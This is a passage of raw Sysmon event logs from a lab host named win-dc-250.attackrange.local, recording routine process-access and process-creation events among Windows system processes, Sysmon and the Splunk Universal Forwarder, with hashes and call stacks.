Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004280Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:17.095{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-4312-6000-9C00-000000009A01}3024C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004279Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:17.095{08A6967A-4286-6000-0B00-000000009A01}852900C:\Windows\system32\lsass.exe{08A6967A-4312-6000-9C00-000000009A01}3024C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004321Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:18.942{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4332-6000-EF00-000000009A01}4392C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004320Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:18.942{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004319Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:18.942{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004318Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:18.942{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004317Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:18.942{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004316Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:18.942{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004315Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:18.942{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004314Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:18.942{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004313Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:18.942{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004312Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:18.942{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004311Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:18.942{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4332-6000-EF00-000000009A01}4392C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004310Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:18.942{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4332-6000-EF00-000000009A01}4392C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004309Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:18.943{08A6967A-4332-6000-EF00-000000009A01}4392C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004308Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:18.426{08A6967A-4332-6000-EE00-000000009A01}21521852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004307Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:18.269{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4332-6000-EE00-000000009A01}2152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004306Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:18.269{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004305Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:18.269{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004304Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:18.269{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004303Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:18.269{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004302Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:18.269{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004301Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:18.269{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004300Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:18.269{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004299Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:18.269{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004298Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:18.269{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.